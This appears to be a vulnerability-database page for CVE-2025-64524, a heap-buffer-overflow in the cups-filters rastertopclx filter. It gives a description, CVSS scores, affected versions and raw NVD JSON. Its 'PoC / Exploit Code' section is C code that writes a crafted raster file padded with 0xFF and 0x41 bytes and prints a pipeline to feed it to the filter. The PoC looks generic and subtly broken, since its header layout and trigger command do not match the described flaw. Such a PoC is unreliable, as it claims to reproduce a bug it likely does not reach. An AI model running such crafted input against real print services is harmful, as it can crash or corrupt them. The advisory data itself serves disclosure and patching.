Security Vulnerability Report
CVE-2025-64524 CVSS 3.3 LOW

CVE-2025-64524

Published: 2025-11-20 18:15:51
Last Modified: 2025-12-15 14:35:41

Description

cups-filters contains backends, filters, and other software required to get the CUPS printing service working on operating systems other than macOS. In versions 2.0.1 and prior, a heap-buffer-overflow vulnerability in the rastertopclx filter causes the program to crash with a segmentation fault when processing maliciously crafted input data. This issue can be exploited to trigger memory corruption, potentially leading to arbitrary code execution. This issue has been patched via commit 956283c.

CVSS Details

CVSS Score: 3.3
Severity: LOW
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:openprinting:cups-filters:*:*:*:*:*:*:*:* - VULNERABLE
cups-filters <= 2.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// PoC for CVE-2025-64524: cups-filters rastertopclx heap-buffer-overflow
// This PoC generates a malicious Raster file that triggers overflow in rastertopclx
void generate_malicious_raster(const char *filename) {
    FILE *fp = fopen(filename, "wb");
    if (!fp) {
        perror("Failed to open file");
        return;
    }

    // Raster header - crafted to trigger buffer overflow
    unsigned char raster_header[1024] = {0};

    // Set Raster magic number
    memcpy(raster_header, "RaS", 3);

    // Set version and dimensions to trigger overflow in rastertopclx
    raster_header[3] = 2; // version
    raster_header[4] = 1; // compression type

    // Write oversized data to cause heap overflow
    memset(raster_header + 100, 0xFF, 900);
    fwrite(raster_header, 1, sizeof(raster_header), fp);

    // Write additional malicious payload
    unsigned char payload[4096];
    memset(payload, 0x41, sizeof(payload));
    fwrite(payload, 1, sizeof(payload), fp);

    fclose(fp);
    printf("Malicious Raster file generated: %s\n", filename);
}

int main() {
    const char *poc_file = "CVE-2025-64524.poc";
    generate_malicious_raster(poc_file);
    printf("To trigger the vulnerability, process this file with rastertopclx:\n");
    printf("pcltoraster < %s | rastertopclx > output.pcl\n", poc_file);
    return 0;
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64524", "sourceIdentifier": "[email protected]", "published": "2025-11-20T18:15:51.250", "lastModified": "2025-12-15T14:35:40.950", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "cups-filters contains backends, filters, and other software required to get the cups printing service working on operating systems other than macos. In versions 2.0.1 and prior, a heap-buffer-overflow vulnerability in the rastertopclx filter causes the program to crash with a segmentation fault when processing maliciously crafted input data. This issue can be exploited to trigger memory corruption, potentially leading to arbitrary code execution. This issue has been patched via commit 956283c."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-122"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": 
[{"vulnerable": true, "criteria": "cpe:2.3:a:openprinting:cups-filters:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.0.1", "matchCriteriaId": "AF81B006-2017-43AF-B469-6CE6EF1A49AE"}]}]}], "references": [{"url": "https://github.com/OpenPrinting/cups-filters/commit/956283c74a34ae924266a2a63f8e5f529a1abd06", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/OpenPrinting/cups-filters/security/advisories/GHSA-rq44-2q5p-x3hv", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/11/20/1", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Patch"]}, {"url": "https://github.com/OpenPrinting/cups-filters/security/advisories/GHSA-rq44-2q5p-x3hv", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}